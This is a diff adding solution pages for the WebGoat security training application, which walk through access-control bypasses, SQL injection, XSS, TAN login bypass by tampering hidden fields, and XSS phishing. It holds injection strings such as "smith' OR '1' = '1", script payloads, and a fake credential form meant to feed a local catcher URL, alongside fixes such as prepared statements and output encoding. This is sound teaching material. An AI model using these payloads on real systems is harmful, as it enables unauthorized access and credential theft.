+control scheme might allow a user to perform accesses 
+that are not allowed by his/her assigned roles, or 
+somehow obtain unauthorized roles.
+</p> 
+
+<p><b>General Goal(s):</b><br/>
+Your goal is to explore the access control 
+rules that govern this site. Each role has permission to 
+certain resources (A-F). Each user is assigned one or more roles. 
+Only the user with the [Admin] role should have access 
+to the 'F' resources. In a successful attack, a user doesn't 
+have the [Admin] role can access resource F.
+</p>
+
+<p>
+<b>Solution:</b><br/>
+You have to be sure that the user is AUTHORIZED to do an action and that
+he is authorized to do this action on a certain employee! So you have to check for his authorization.
+You have to write some code in the class 
+org.owasp.webgoat.lessons.RoleBasedAccesControl.RoleBasedAccessControl.java.
+Alter the handleRequest method as there is happening the dispatching.
+Action has already a method called isAuthorizedForEmployee which you can use:
+</p>
+<pre><code>
+//***************CODE HERE*************************
+if(!isAuthorized(s, userId, requestedActionName))
+{
+  throw new UnauthorizedException();
+}
+if(!action.isAuthorizedForEmployee(s, userId, employeeId))
+{
+  throw new UnauthorizedException();
+}						
+//*************************************************
+</code></pre>
+Try the attack again and you will see that the authorization fails and the
+lesson is completed.
+
+</body>
+</html>

webgoat/main/project/WebContent/lesson_solutions/Lab Access Control/Lab Bypass Business Layer Access Control.html

@@ -0,0 +1,48 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Solution Lab Role Based Access Control Stage1</title>
+<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
+</head>
+<body>
+<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>
+
+<p><b>Concept / Topic To Teach:</b><br/>
+In role-based access control scheme, a role represents 
+a set of access permissions and privileges. A user can be 
+assigned one or more roles. A role-based access control 
+normally consists of two parts: role permission management 
+and role assignment. A broken role-based access 
+control scheme might allow a user to perform accesses 
+that are not allowed by his/her assigned roles, or 
+somehow obtain unauthorized roles.
+</p> 
+
+<p><b>General Goal(s):</b><br/>
+Your goal is to explore the access control 
+rules that govern this site. Each role has permission to 
+certain resources (A-F). Each user is assigned one or more roles. 
+Only the user with the [Admin] role should have access 
+to the 'F' resources. In a successful attack, a user doesn't 
+have the [Admin] role can access resource F.
+</p>
+
+<p>
+<b>Solution:</b><br/>
+To solve this exercise you have to know the name of the action, which
+deletes employees. Of course you could just guess
+it because it has a really logical name.
+But we will look it up. So your first step is to log in as John with john as 
+password. Use WebScarab to intercept the delete request.
+<center>
+<img src="/WebGoat/lesson_solutions/Lab Access Control/images/access_control_stage1.png" width=450px alt="deleteAction" />
+</center>
+As you can see the delete action is called DeleteProfile.
+Now log in as Tom. Click in the list on his name and make sure WebScarab 
+will intercept the next request. Click on a button, for example the 
+'ViewProfile' button. Change in WebScarab the action to DeleteProfile 
+and you are done!
+
+</body>
+</html>

webgoat/main/project/WebContent/lesson_solutions/Lab Access Control/Lab Bypass Data Layer Access Control.html

@@ -0,0 +1,46 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Solution Lab Role Based Access Control Stage3</title>
+<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
+</head>
+<body>
+<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>
+
+<p><b>Concept / Topic To Teach:</b><br/>
+In role-based access control scheme, a role represents 
+a set of access permissions and privileges. A user can be 
+assigned one or more roles. A role-based access control 
+normally consists of two parts: role permission management 
+and role assignment. A broken role-based access 
+control scheme might allow a user to perform accesses 
+that are not allowed by his/her assigned roles, or 
+somehow obtain unauthorized roles.
+</p> 
+
+<p><b>General Goal(s):</b><br/>
+Your goal is to explore the access control 
+rules that govern this site. Each role has permission to 
+certain resources (A-F). Each user is assigned one or more roles. 
+Only the user with the [Admin] role should have access 
+to the 'F' resources. In a successful attack, a user doesn't 
+have the [Admin] role can access resource F.
+</p>
+
+<p>
+<b>Solution:</b><br/>
+In stage 1 we tried to use an action we are not authorised to use.
+In this stage we want to view a profile of an other person. We have the permission
+for the action ViewProfile but we should not have the permission to see a profile
+of another employee!
+</p>
+<p>
+Log in as Tom with tom as password. Click on Tom's name in the list and make sure
+webscarab will intercept the next request. Change the employee_id for example to 101.
+<center>
+<img src="/WebGoat/lesson_solutions/Lab Access Control/images/access_control_stage1.png" width=450px alt="deleteAction" />
+</center>
+
+</body>
+</html>

webgoat/main/project/WebContent/lesson_solutions/Lab SQL Injection/Lab Numeric SQL Injection.html

@@ -0,0 +1,41 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Solution Lab SQL Injection Stage3</title>
+<link rel="stylesheet" type="text/css"
+	href="/WebGoat/lesson_solutions/formate.css">
+</head>
+<body>
+<p><b>Lesson Plan Title:</b> How to Perform a SQLInjection</p>
+
+<p><b>Concept / Topic To Teach:</b><br />
+SQL injection attacks represent a serious threat to any database-driven
+site. The methods behind an attack are easy to learn and the damage
+caused can range from considerable to complete system compromise.
+Despite these risks, an incredible number of systems on the internet are
+susceptible to this form of attack.</p>
+
+<p>Not only is it a threat easily instigated, it is also a threat
+that, with a little common-sense and forethought, can easily be
+prevented.</p>
+
+<p>It is always good practice to sanitize all input data, especially
+data that will used in OS command, scripts, and database queiries, even
+if the threat of SQL injection has been prevented in some other manner.
+</p>
+
+<p><b>General Goal(s):</b><br />
+For this exercise, you will perform SQLInjection attacks. You will also
+implement code changes in the web application to defeat these attacks.</p>
+
+<p><b>Solution:</b><br />
+Choose Larry to log in with password larry. Select yourself from the list 
+and make sure that WebScarab will intercept the next request. Replace the id 101 with following:
+<br/>
+101 OR 1=1 ORDER BY salary desc <br/>
+<p>With '101 OR 1=1' we have a SQL Statement which is always true. It will
+get all the employees from the db but only return one of them. That is why we have to ensure we get 
+the "Big Fish" which is the employee earning most. With 'ORDER BY SALARY DESC' we guarantee exactly this.
+</body>
+</html>

webgoat/main/project/WebContent/lesson_solutions/Lab SQL Injection/Lab Parameterized Query #1.html

@@ -0,0 +1,87 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Solution Lab SQL Injection Stage2</title>
+<link rel="stylesheet" type="text/css"
+	href="/WebGoat/lesson_solutions/formate.css">
+</head>
+<body>
+<p><b>Lesson Plan Title:</b> How to Perform a SQLInjection</p>
+
+<p><b>Concept / Topic To Teach:</b><br />
+SQL injection attacks represent a serious threat to any database-driven
+site. The methods behind an attack are easy to learn and the damage
+caused can range from considerable to complete system compromise.
+Despite these risks, an incredible number of systems on the internet are
+susceptible to this form of attack.</p>
+
+<p>Not only is it a threat easily instigated, it is also a threat
+that, with a little common-sense and forethought, can easily be
+prevented.</p>
+
+<p>It is always good practice to sanitize all input data, especially
+data that will used in OS command, scripts, and database queiries, even
+if the threat of SQL injection has been prevented in some other manner.
+</p>
+
+<p><b>General Goal(s):</b><br />
+For this exercise, you will perform SQLInjection attacks. You will also
+implement code changes in the web application to defeat these attacks.</p>
+
+<b>Solution:</b><br />
+To prevent a SQLInjection you can use "Parametreized Queries". This kind of
+query makes it possible to use every input of an user as a parameter.
+In this lesson you have to change org.owasp.webgoat.lessons.SQLInjection.Login.java
+The query execution in the method login looks like this:<pre><code>
+String query = "SELECT * FROM employee WHERE userid = " + userId + " and password = '" + password + "'";
+// System.out.println("Query:" + query);
+try
+{
+  Statement answer_statement = WebSession.getConnection(s)
+      .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+  ResultSet answer_results = answer_statement.executeQuery(query);
+  etc...
+</code></pre>
+<p>
+To paramerize the Query you have to replace the userinput with questionmarks:<br/>
+<code>String query = "SELECT * FROM employee WHERE userid = ? and password = ?";</code><br/>
+</p>
+<p>
+Now follows the try block with the getConnection method:<br/>
+<code>
+try <br/>
+{<br/>
+&nbsp;&nbsp;Connection connection = WebSession.getConnections(s);
+</code></p>
+<p>
+The next step is to do a so called "PrepareStatement":<br/>
+<code>PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+</code><br/></p>
+<p>
+Now that the query is prepared we have to add the parameters to the query:<br/>
+<code>
+statement.setString(1, userId);<br/>
+statement.setString(2, password);<br>
+</code>
+</p>
+<p>
+We are ready to execute the query!<br/>
+<code>
+ResultSet answer_results = statement.executeQuery();</code>
+</p>
+<p>Putting everything together results in:<br/>
+<pre><code>
+String query = "SELECT * FROM employee WHERE userid = ? and password = ?";
+try
+{
+  Connection connection = WebSession.getConnections(s);
+  PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+  statement.setString(1, userId);
+  statement.setString(2, password);
+  ResultSet answer_results = statement.executeQuery();
+  etc...
+</code></pre>
+
+</body>
+</html>

webgoat/main/project/WebContent/lesson_solutions/Lab SQL Injection/Lab Parameterized Query #2.html

@@ -0,0 +1,51 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Solution Lab SQL Injection Stage4</title>
+<link rel="stylesheet" type="text/css"
+	href="/WebGoat/lesson_solutions/formate.css">
+</head>
+<body>
+<p><b>Lesson Plan Title:</b> How to Perform a SQLInjection</p>
+
+<p><b>Concept / Topic To Teach:</b><br />
+SQL injection attacks represent a serious threat to any database-driven
+site. The methods behind an attack are easy to learn and the damage
+caused can range from considerable to complete system compromise.
+Despite these risks, an incredible number of systems on the internet are
+susceptible to this form of attack.</p>
+
+<p>Not only is it a threat easily instigated, it is also a threat
+that, with a little common-sense and forethought, can easily be
+prevented.</p>
+
+<p>It is always good practice to sanitize all input data, especially
+data that will used in OS command, scripts, and database queiries, even
+if the threat of SQL injection has been prevented in some other manner.
+</p>
+
+<p><b>General Goal(s):</b><br />
+For this exercise, you will perform SQLInjection attacks. You will also
+implement code changes in the web application to defeat these attacks.</p>
+
+<b>Solution:</b><br />
+The solution is simular to Stage2. That is why here is only a short solution.<br/>
+You have to alter the class org.owasp.webgoat.lessons.SQLInjection.ViewProfile.java<br/>
+Alter the method getEmployeeProfile to something like this:
+<pre><code>
+String query = "SELECT employee.* "
+    + "FROM employee,ownership WHERE employee.userid = ownership.employee_id and "
+    + "ownership.employer_id = ? and ownership.employee_id = ?";
+try
+{
+  Connection connection = WebSession.getConnections(s);
+  PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+  statement.setString(1, userId);
+  statement.setString(2, subjectUserId);
+  ResultSet answer_results = statement.executeQuery();
+  etc...
+</code></pre>
+
+</body>
+</html>

webgoat/main/project/WebContent/lesson_solutions/Lab SQL Injection/Lab String SQL Injection.html

@@ -0,0 +1,39 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Solution Lab SQL Injection Stage1</title>
+<link rel="stylesheet" type="text/css"
+	href="/WebGoat/lesson_solutions/formate.css">
+</head>
+<body>
+<p><b>Lesson Plan Title:</b> How to Perform a SQLInjection</p>
+
+<p><b>Concept / Topic To Teach:</b><br />
+SQL injection attacks represent a serious threat to any database-driven
+site. The methods behind an attack are easy to learn and the damage
+caused can range from considerable to complete system compromise.
+Despite these risks, an incredible number of systems on the internet are
+susceptible to this form of attack.</p>
+
+<p>Not only is it a threat easily instigated, it is also a threat
+that, with a little common-sense and forethought, can easily be
+prevented.</p>
+
+<p>It is always good practice to sanitize all input data, especially
+data that will used in OS command, scripts, and database queiries, even
+if the threat of SQL injection has been prevented in some other manner.
+</p>
+
+<p><b>General Goal(s):</b><br />
+For this exercise, you will perform SQLInjection attacks. You will also
+implement code changes in the web application to defeat these attacks.</p>
+
+<p><b>Solution:</b><br />
+Select Neville as user to log in. Make sure WebScarab will intercept the next request.
+Hit the Login Button and Change the password parameter in WebScarab to smith' OR '1' = '1. 
+Et voila you are logged in as Neville without knowing the password as the query
+will lookup if the password is smith and if not it controls if 1=1 what
+return true.</p>
+</body>
+</html>

webgoat/main/project/WebContent/lesson_solutions/Lab XSS/Lab Block Reflected XSS.html

@@ -0,0 +1,32 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Solution Lab Block Stored XSS</title>
+<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
+</head>
+<body>
+<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>
+
+<p><b>Concept / Topic To Teach:</b><br/>
+It is always a good practice to scrub all inputs, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere. Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user's message is retrieved.
+XSS can also occur when unvalidated user input is used in an HTTP response. In a reflected XSS attack, an attacker can craft a URL with the attack script and post it to another website, email it, or otherwise get a victim to click on it.
+</p> 
+
+<p><b>General Goal(s):</b><br/>
+For this exercise, you will perform stored and reflected XSS attacks. You will also implement code changes in the web application to defeat these attacks. 
+</p>
+
+<b>Solution:</b><br/>
+The Solution is rather simular to stage 2. You have to edit org.owasp.webgoat.lessons.CrossSiteScripting.FindProfile.java.
+Alter the method getRequestParameter. The body of the mehtod should look something like this:<pre><code>
+String regex = "[\\s\\w-,]*";
+String parameter = s.getParser().getRawParameter(name);
+Pattern pattern = Pattern.compile(regex);
+validate(parameter, pattern);
+		
+return parameter;
+</code></pre>
+
+</body>
+</html>

webgoat/main/project/WebContent/lesson_solutions/Lab XSS/Lab Block Stored XSS using Input Validation.html

@@ -0,0 +1,46 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Solution Lab Block Stored XSS</title>
+<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
+</head>
+<body>
+<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>
+
+<p><b>Concept / Topic To Teach:</b><br/>
+It is always a good practice to scrub all inputs, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere. Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user's message is retrieved.
+XSS can also occur when unvalidated user input is used in an HTTP response. In a reflected XSS attack, an attacker can craft a URL with the attack script and post it to another website, email it, or otherwise get a victim to click on it.
+</p> 
+
+<p><b>General Goal(s):</b><br/>
+For this exercise, you will perform stored and reflected XSS attacks. You will also implement code changes in the web application to defeat these attacks. 
+</p>
+
+<p><b>Solution:</b><br/>
+You have to alter the method parseEmployeeProfile in the class UpdateProfile.java which is
+placed in the package org.owasp.webgoat.lessons.CrossSiteScripting<br/>
+The place to code is marked! Following code will work:<br/>
+</p>
+<p>
+<code>	
+/**Your code**/<br/>
+String regex = "[\\s\\w-,]*";<br/>
+String stringToValidate = firstName+lastName+ssn+title+phone+address1+address2+<br/>startDate+ccn+disciplinaryActionDate+<br/>disciplinaryActionNotes+personalDescription;<br/>
+Pattern pattern = Pattern.compile(regex);<br/>
+validate(stringToValidate, pattern);<br/>
+/**End of your code**/
+</code>
+</p>
+<p>
+This validation allows following:<br>
+\s = whitspace: \t\n\x0B\f\r<br>
+\w = word: a-zA-Z_0-9<br>
+and the characters - and ,
+</p>
+<p>
+Use of any other character will throw a Validation Exception.
+</p>
+
+</body>
+</html>

webgoat/main/project/WebContent/lesson_solutions/Lab XSS/Lab Block Stored XSS using Output Encoding.html

@@ -0,0 +1,26 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Solution Lab Block Stored XSS</title>
+<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
+</head>
+<body>
+<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>
+
+<p><b>Concept / Topic To Teach:</b><br/>
+It is always a good practice to scrub all inputs, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere. Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user's message is retrieved.
+XSS can also occur when unvalidated user input is used in an HTTP response. In a reflected XSS attack, an attacker can craft a URL with the attack script and post it to another website, email it, or otherwise get a victim to click on it.
+</p> 
+
+<p><b>General Goal(s):</b><br/>
+For this exercise, you will perform stored and reflected XSS attacks. You will also implement code changes in the web application to defeat these attacks. 
+</p>
+
+<p><b>Solution:</b><br/>
+You have to use a static method called encode(String s) which is part of the class org.owasp.webgoat.util.HtmlEncoder.
+<p>This method changes all special characters in the string. Now you have to use this method in the getEmployeeProfile method in the org.owasp.webgoat.lessons.CrossSiteScripting class. 
+Replace all answer_results.getString(someString) with HtmlEncoder.encode(answer_results.getString(someString)) and you are done.</p>
+
+</body>
+</html>

webgoat/main/project/WebContent/lesson_solutions/Lab XSS/Lab Reflected XSS.html

@@ -0,0 +1,27 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Solution Lab Block Stored XSS</title>
+<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
+</head>
+<body>
+<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>
+
+<p><b>Concept / Topic To Teach:</b><br/>
+It is always a good practice to scrub all inputs, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere. Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user's message is retrieved.
+XSS can also occur when unvalidated user input is used in an HTTP response. In a reflected XSS attack, an attacker can craft a URL with the attack script and post it to another website, email it, or otherwise get a victim to click on it.
+</p> 
+
+<p><b>General Goal(s):</b><br/>
+For this exercise, you will perform stored and reflected XSS attacks. You will also implement code changes in the web application to defeat these attacks. 
+</p>
+
+<p><b>Solution:</b><br/>
+First log in as an user for example as Larry with password larry. Now click on 
+the 'SearchStaff' Button. Burry a script in the field for example: 
+<code>&lt;script&gt;alert("Dangerous");&lt;/script&gt;</code>. Now hit
+the 'FindProfile' Button and you are done.</p>
+
+</body>
+</html>

webgoat/main/project/WebContent/lesson_solutions/Lab XSS/Lab Stored XSS Revisited.html

@@ -0,0 +1,27 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Solution Lab Block Stored XSS</title>
+<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
+</head>
+<body>
+<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>
+
+<p><b>Concept / Topic To Teach:</b><br/>
+It is always a good practice to scrub all inputs, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere. Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user's message is retrieved.
+XSS can also occur when unvalidated user input is used in an HTTP response. In a reflected XSS attack, an attacker can craft a URL with the attack script and post it to another website, email it, or otherwise get a victim to click on it.
+</p> 
+
+<p><b>General Goal(s):</b><br/>
+For this exercise, you will perform stored and reflected XSS attacks. You will also implement code changes in the web application to defeat these attacks. 
+</p>
+
+<p><b>Solution:</b><br/>
+Log in as David with david as password. Choose Bruce from the List and click
+on the 'ViewProfile' Button. 
+
+</p>
+
+</body>
+</html>

webgoat/main/project/WebContent/lesson_solutions/Lab XSS/Lab Stored XSS.html

@@ -0,0 +1,36 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Solution Lab Block Stored XSS</title>
+<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
+</head>
+<body>
+<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>
+
+<p><b>Concept / Topic To Teach:</b><br/>
+It is always a good practice to scrub all inputs, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere. Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user's message is retrieved.
+XSS can also occur when unvalidated user input is used in an HTTP response. In a reflected XSS attack, an attacker can craft a URL with the attack script and post it to another website, email it, or otherwise get a victim to click on it.
+</p> 
+
+<p><b>General Goal(s):</b><br/>
+For this exercise, you will perform stored and reflected XSS attacks. You will also implement code changes in the web application to defeat these attacks. 
+</p>
+
+<p><b>Solution:</b><br/>
+First Login as Tom with tom as password. Select Tom from the list and click on the View Profile Button.
+Now should appear Tom's Profile. Click on the 'Edit Profile' Button and try an XSS attack on the street filed.<br/>
+For example: &lt;script&gt;alert("Got Ya");&lt;/script&gt;<br/>
+Click on the UpdateProfile Button and Log out.</p><p>
+<p>
+<center>
+<img src="/WebGoat/lesson_solutions/Lab XSS/images/stored_xss.png" width=450px alt="stored_xss.png" />
+</center>
+<p>
+Now log in as Jerry with jerry as password. Select from the the list the profile of tom and hit the 
+ViewProfile Button. Congratulation! You have completed the lesson.
+
+</p>
+
+</body>
+</html>

webgoat/main/project/WebContent/lesson_solutions/MultiLevelLogin1/MultiLevelLogin1.html

@@ -0,0 +1,50 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Multi Level Login 1</title>
+<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
+</head>
+<body>
+<p><b>Lesson Plan Title:</b> Multi Level Login 1</p>
+
+<p><b>Concept / Topic To Teach:</b><br/>
+A Multi Level Login should provide a strong authentication. 
+This is archived by adding a second layer. After having logged 
+in with your user name and password you are asked for a 
+'Transaction Authentication Number' (TAN). This is often used by 
+online banking. You get a list with a lots of TANs generated only 
+for you by the bank. Each TAN is used only once. Another method is 
+to provide the TAN by SMS. This has the advantage that an attacker
+ can not get TANs provided by the user.
+</p> 
+
+<p><b>General Goal(s):</b><br/>
+In this Lesson you try to get around the strong authentication. 
+You have to break into another account. The user name, password 
+and a already used TAN is provided. You have to make sure the server 
+accept the TAN even it is already used. 
+</p>
+
+<b>Solution:</b><br/>
+This Lesson has two stages. The first stage is only to show how a multi level login
+works. In the second you have to breake the strong authentication.
+<p>
+<b>Stage 1</b><br>
+This stage should be rather straight forward. Give in as name Jane
+and as password tarzan. Afther clicking on the submit button
+you will be asked for the TAN. Choose the correct TAN from the
+list provided, click on the submit button and you are done.
+</p>
+<p>
+<b>Stage 2</b><br>
+The first step in this stage is equal to Stage 1. Log in as Jane with tarzan.
+Now you will be asked for a TAN. Unfortunately the TAN you have only a already
+used TAN from the victim. Fill in the TAN you have and make sure that WebScarab
+will intercept the next request. Hit the submit button and change the hidden_tan
+value to 1. Congratulations you are logged in as Jane.
+</p>
+
+
+</body>
+</html>

webgoat/main/project/WebContent/lesson_solutions/MultiLevelLogin2/MultiLevelLogin2.html

@@ -0,0 +1,40 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Multi Level Login 2</title>
+<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
+</head>
+<body>
+<p><b>Lesson Plan Title:</b> Multi Level Login 2</p>
+
+<p><b>Concept / Topic To Teach:</b><br/>
+A Multi Level Login should provide a strong authentication. 
+This is archived by adding a second layer. After having logged 
+in with your user name and password you are asked for a 
+'Transaction Authentication Number' (TAN). This is often used by 
+online banking. You get a list with a lots of TANs generated only 
+for you by the bank. Each TAN is used only once. Another method is 
+to provide the TAN by SMS. This has the advantage that an attacker
+ can not get TANs provided by the user.
+</p> 
+
+<p><b>General Goal(s):</b><br/>
+In this lesson you have to try to break into another account. 
+You have an own account for WebGoat Financial but you want to log into 
+another account only knowing the user name of the victim to attack.  
+</p>
+
+<b>Solution:</b><br/>
+The solution for this lesson is similar to the solution from 
+multi level login 1 stage 2 but the approach is a little different.
+This time you have only the user name of your victim but an own account
+on WebGoat Financial. <br><br>
+Log in as Joe with password banana. Now make sure the next request will be intercepted
+by WebScarab. Fill in the TAN you are asked for and hit the submit button.
+Change now the hidden_user value from Joe to Jane and you are logged in 
+as Jane.
+
+
+</body>
+</html>

webgoat/main/project/WebContent/lesson_solutions/PasswordStrength.html

@@ -0,0 +1,38 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>password Strength</title>
+<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
+</head>
+<body>
+<p><b>Lesson Plan Title:</b> Password Strength</p>
+
+<p><b>Concept / Topic To Teach:</b> </p>
+<!-- Start Instructions -->
+Accounts are only as secure as there passwords. Most users have the same weak password everywhere. If you want to protect them against brute-force-attacks your application should have good requirements for passwords. The password should contain lower case letters, capitals and numbers. The longer the password, the better.
+<!-- Stop Instructions -->
+<br>
+<p><b>General Goal(s):</b> </p>
+ For this exercise, your job is to test several passwords on <a href="https://www.cnlab.ch/codecheck" target="_blank">https://www.cnlab.ch/codecheck</a>.
+<br><br>
+<b>Solution:</b><br/>
+Open your browser on <a href="https://www.cnlab.ch/codecheck" target="_blank">https://www.cnlab.ch/codecheck</a>. Copy the first password in the field and click "Run the check".<br><br>
+<img src="/WebGoat/lesson_solutions/PasswordStrength_files/image001.jpg"><br/>
+<font size="2"><b>Code checker</b></font><br/><br/><br/>
+You will get a little pop-up. Choose "Yes, I want this word to be tested".<br><br>
+<img src="/WebGoat/lesson_solutions/PasswordStrength_files/image002.jpg"><br/>
+<font size="2"><b>Pop-up</b></font><br/><br/><br/>
+You will get get the result of the check.<br><br>
+<img src="/WebGoat/lesson_solutions/PasswordStrength_files/image003.jpg"><br/>
+<font size="2"><b>The result</b></font><br/><br/><br/>
+Do this with all of the five given passwords.<br><br>
+Here are the results you get:<br><br>
+Password = 123456: <font color="#ff0000">0</font> seconds<br>
+Password = abzfez: <font color="#ff0000">1394</font> seconds<br>
+Password = a9z1ez: <font color="#ff0000">5</font> hours<br>
+Password = aB8fEz: <font color="#ff0000">2</font> days<br>
+Password = z8!E?7: <font color="#ff0000">41</font> days<br>
+<br><br><br>
+</body>
+</html>

webgoat/main/project/WebContent/lesson_solutions/Phishing.html

@@ -0,0 +1,67 @@
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Solution Lab Block Stored XSS</title>
+<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
+</head>
+<body>
+<p><b>Lesson Plan Title:</b> Phishing with XSS</p>
+
+<p><b>Concept / Topic To Teach:</b><br/>
+It is always a good practice to validate all input on the 
+server side. XSS can occur when unvalidated user input is used 
+in an HTTP response. With the help of XSS you can do a Phishing 
+Attack and add content to a page which looks official. It is very 
+hard for a victim to determinate that the content is malicious.
+</p> 
+
+<p><b>General Goal(s):</b><br/>
+The user should be able to add a form asking for username 
+and password. On submit the input should be sent to 
+http://localhost/WebGoat/catcher?PROPERTY=yes&user=catchedUserName&password=catchedPasswordName
+</p>
+
+<b>Solution:</b><br/>
+With XSS it is possible to add further elements to an exsisting Page.
+This solution consists of two parts you have to combine:
+<ul>
+<li>A form the victim has to fill in</li>
+<li>A script which reads the form and sends the gathered information to the attacker</li>
+</ul>
+A Form whith username and password could look like this:<br/>
+<p>
+&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H3
+&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot;
+name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot;
+name = &quot;pass&quot;&gt;&lt;br&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;
+<br/><br/>Search for this term and you will see that a form is added to the page.
+</p>
+Now you need a script:
+<p>
